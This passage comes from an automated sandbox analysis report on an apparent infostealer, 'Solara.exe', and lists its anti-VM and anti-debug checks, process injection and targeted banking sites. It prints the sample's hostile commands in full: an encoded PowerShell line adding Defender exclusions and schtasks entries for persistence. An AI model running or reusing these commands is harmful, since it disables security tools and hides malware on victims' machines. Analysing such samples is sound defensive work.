                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0094FD8F
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0094FCDE FindFirstFileExW,2_2_0094FCDE
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0094FD8F
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599778Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599326Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599206Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598836Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598732Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeThread delayed: delay time: 598405Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Solara.exe.bin.exe, 00000002.00000003.945226167.0000000003628000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                  Source: Z6T9189FJQPDA5HSM49.exe.2.drBinary or memory string: Vmwaretrat
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: Z6T9189FJQPDA5HSM49.exe.2.drBinary or memory string: vboxservice
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636710927.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2171484979.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.930667144.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172252845.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.974203654.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636739565.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2173131503.000001B3CC62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2175447695.000001B3D1C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Z6T9189FJQPDA5HSM49.exe.2.drBinary or memory string: Vmwareuser
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1091052476.00000000014C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.drBinary or memory string: vboxtray
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Z6T9189FJQPDA5HSM49.exe.2.drBinary or memory string: Vmtoolsd
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008D553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,0_2_008D553B
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0093DC9E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009661B4 mov edi, dword ptr fs:[00000030h]0_2_009661B4
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0094B71C GetProcessHeap,0_2_0094B71C
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0093D8E2
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093DC92 SetUnhandledExceptionFilter,0_2_0093DC92
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0093DC9E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_00945DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00945DCE
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0093D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0093D8E2
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0093DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0093DC9E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00945DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00945DCE
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_009661B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_009661B4
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#BosBZwmO#> Add-MpPreference <#RRSWq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#HAoEWcB#> -Force <#wjh0wv#>
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#BosBZwmO#> Add-MpPreference <#RRSWq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#HAoEWcB#> -Force <#wjh0wv#>Jump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeMemory written: C:\Users\user\Desktop\Solara.exe.bin.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga="
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga=" Jump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,0_2_0094B007
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0094F048
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,0_2_0094F299
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0094F334
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,0_2_0094F587
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,0_2_0094F5E6
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,0_2_0094F6BB
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0094F7AD
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,0_2_0094F706
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,0_2_0094F8B3
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,0_2_0094AB0C
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,2_2_0094F8B3
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,2_2_0094B007
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_0094F048
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,2_2_0094F299
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,2_2_0094AB0C
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_0094F334
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,2_2_0094F587
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,2_2_0094F5E6
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: EnumSystemLocalesW,2_2_0094F6BB
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0094F7AD
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: GetLocaleInfoW,2_2_0094F706
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
